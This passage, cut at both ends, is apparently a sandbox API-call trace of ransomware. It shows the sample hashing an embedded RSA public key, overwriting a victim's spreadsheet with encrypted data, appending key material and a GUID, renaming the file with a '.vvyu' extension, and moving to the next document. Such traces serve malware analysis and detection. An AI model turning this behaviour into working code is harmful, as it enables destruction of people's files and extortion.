lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.158] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.158] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xfbbc, lpOverlapped=0x0) returned 1 [0193.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.159] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.159] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.160] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.160] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.160] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.160] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.160] GetLastError () returned 0x0 [0193.160] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.160] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.161] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.161] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.161] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfbc0) returned 0x2ea79b0 [0193.161] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95698 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e956e0 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.162] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0193.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93780 [0193.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93768 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.165] GetCurrentThreadId () returned 0x66c [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ecc0 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.166] GetCurrentThreadId () returned 0x66c [0193.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.167] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0193.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93780 [0193.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0193.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937e0 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937f8 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93798 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93768 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0193.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0193.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.170] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.171] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.172] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.173] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0193.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e956e0 | out: hHeap=0x620000) returned 1 [0193.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.176] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xfbb7, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xfbb7, lpOverlapped=0x0) returned 1 [0193.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0193.177] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xfbbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.177] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.178] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.179] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.179] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.179] CloseHandle (hObject=0x568) returned 1 [0193.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0193.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.181] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\0Lepi.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\0lepi.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\0Lepi.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\0lepi.xlsx.vvyu")) returned 1 [0193.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.183] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.188] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46e0c780, ftCreationTime.dwHighDateTime=0x1d89b43, ftLastAccessTime.dwLowDateTime=0xf79abc10, ftLastAccessTime.dwHighDateTime=0x1d89b58, ftLastWriteTime.dwLowDateTime=0xf79abc10, ftLastWriteTime.dwHighDateTime=0x1d89b58, nFileSizeHigh=0x0, nFileSizeLow=0x229f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2oZu1wT.ppt", cAlternateFileName="")) returned 1 [0193.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e956e0 [0193.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 